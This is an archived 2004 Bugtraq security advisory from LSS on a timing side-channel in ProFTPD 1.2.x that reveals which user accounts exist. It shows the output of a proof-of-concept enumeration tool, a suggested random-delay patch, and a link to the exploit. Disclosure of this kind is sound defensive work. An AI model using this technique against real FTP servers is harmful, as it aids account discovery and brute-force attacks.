ProFTPD 1.2.x remote users enumeration bug

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: ProFTPD 1.2.x remote users enumeration bug
From: LSS Security <exposed@xxxxxx>
Date: Fri, 15 Oct 2004 18:00:51 +0200
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Mutt/1.4i

                        LSS Security Advisory #LSS-2004-10-2

                               http://security.lss.hr
                           
                                
---

Title              : ProFTPD 1.2.x remote users enumeration bug
Advisory ID        : LSS#2004-10-2
Date               : October 14th, 2004
Advisory URL:      : 
http://security.lss.hr/index.php?page=details&ID=LSS-2004-10-02
Impact             : Remote users enumeration
Risk level         : Low
Vulnerability type : Remote
Vendors contacted  : Proftpd.org, 09.09.2004.

---



==[ Overview

ProFTPD is a very popular FTP (File Transfer Protocol) server, included by
default in many Linux/Unix distributions. LSS Security Team discovered a
remote users enumeration bug in ProFTPD, which can be used to identify and
differentiate valid user accounts on the remote system. Vulnerabilities 
similar to the one described here have already been discovered on many 
other network servers.



==[ Vulnerability

It is possible to determine which user names are valid, which are special, 
and which ones do not exist on the remote system. That is accomplished by 
code execution path timing analysis attack at the ProFTPD login procedure.

There is a very small (but significant) difference in time delay of code 
execution path between valid and non-valid user names. That can be used 
to remotely determine the difference between existent and non-existent 
users.

The time delay can be measured by using a simple FTP client that will
calculate elapsed time between 'USER' command sent by client, and the 
server response. Because of the very short response period, elapsed time
should be measured in microseconds.
LSS has developed simple PoC exploit that is presented here:

Special user - root:

[ljuranic@diana ljuranic]$ ./a.out xxx.xxx.xxx.xxx root

Proftpd remote users discovery exploit
      Coded by Leon / LSS Security
>-------------------------------------<
Login time:  720 | 493 | 446 | 444 | 443 | 441 | 441 | 442 |
Avrg: 483
.....
Login time:  732 | 462 | 445 | 442 | 445 | 442 | 442 | 442 |
Avrg: 481
.....
Login time:  725 | 470 | 450 | 447 | 446 | 447 | 446 | 446 |
Avrg: 484

Average login time for the special user (root) is about 480 usec. All other
special users will have approximately the same login time delay.


Normal user - ljuranic:

[ljuranic@diana ljuranic]$ ./a.out xxx.xxx.xxx.xxx ljuranic
Proftpd remote users discovery exploit
      Coded by Leon / LSS Security
>-------------------------------------<
Login time:  885 | 634 | 617 | 615 | 614 | 613 | 615 | 738 |
Avrg: 666
.....
Login time:  892 | 701 | 623 | 617 | 618 | 618 | 618 | 616 |
Avrg: 662
.....
Login time:  927 | 658 | 622 | 619 | 617 | 616 | 617 | 616 |
Avrg: 661

Average login time for normal user (ljuranic) is about 660 usec. All other 
normal users will have approximately the same login delay.


Non existent user - non-existent:

[ljuranic@diana ljuranic]$ ./a.out xxx.xxx.xxx.xxx non-existent
Proftpd remote users discovery exploit
      Coded by Leon / LSS Security
>-------------------------------------<
Login time:  656 | 417 | 401 | 398 | 398 | 395 | 396 | 397 |
Avrg: 432
.....
Login time:  647 | 418 | 401 | 400 | 400 | 399 | 399 | 399 |
Avrg: 432
.....
Login time:  647 | 413 | 401 | 400 | 400 | 400 | 400 | 400 |
Avrg: 432

Average login time for non existent user is about 430 usec.

The time difference between three types of user accounts is evident, making
it easy to determine other valid, non-valid, and special user accounts.
This vulnerability can be used to launch more efficient brute-force 
attacks.



===[ Affected versions

Vulnerability was successfully tested on ProFTPD versions 1.2.8 and 1.2.10,
but other versions may be vulnerable as well. Test server was placed on the
local Ethernet 10/100 network, and tests were conducted over the Internet.



===[ Fix

Pseudo-random usleep() at the login procedure that will obfuscate time leak. 
Something like this:

proftpd-1.2.10/modules/mod_auth.c
1867a1868,1877
>   {
>     unsigned int randa;
>     struct timeval tv;
>     struct timezone tz;
>     gettimeofday (&tv, &tz);
>     srand(tv.tv_usec);
>     randa = rand() % 20000;
>     usleep(randa);
>    }
>

After this simple patch is applied, it is impossible to tell which users do
and don't exist:

[ljuranic@diana ljuranic]$ ./a.out xxx.xxx.xxx.xxx root
Proftpd remote users discovery exploit
      Coded by Leon / LSS Security
>-------------------------------------<
Login time: 14954 | 29854 | 19939 | 20024 | 20044 | 19931 | 29988 | 30009|
Avrg: 23092
.....
Login time: 11677 | 19802 | 20042 | 29941 | 20093 | 19899 | 20005 | 30015|
Avrg: 21434
.....
Login time: 18027 | 20062 | 19877 | 20006 | 20050 | 30049 | 19906 | 29989|
Avrg: 22245



===[ PoC Exploit

http://security.lss.hr/Poc/



===[ Credits

This vulnerability was found by Leon Juranic (ljuranic@xxxxxx).



===[ LSS Security Contact
 
 LSS Security Team, <eXposed by LSS>
 
 WWW    : http://security.lss.hr
 E-mail : security@xxxxxx
 Tel    : +385 1 6129 775

Prev by Date: Multiple Cross Site Scripting Vulnerabilities in FuseTalk
Next by Date: Re: Format String Vulnerability in Valve's CS-Source
Previous by thread: Multiple Cross Site Scripting Vulnerabilities in FuseTalk
Next by thread: Microsoft Windows NetDDE Service Buffer Overflow
Index(es):
- Date
- Thread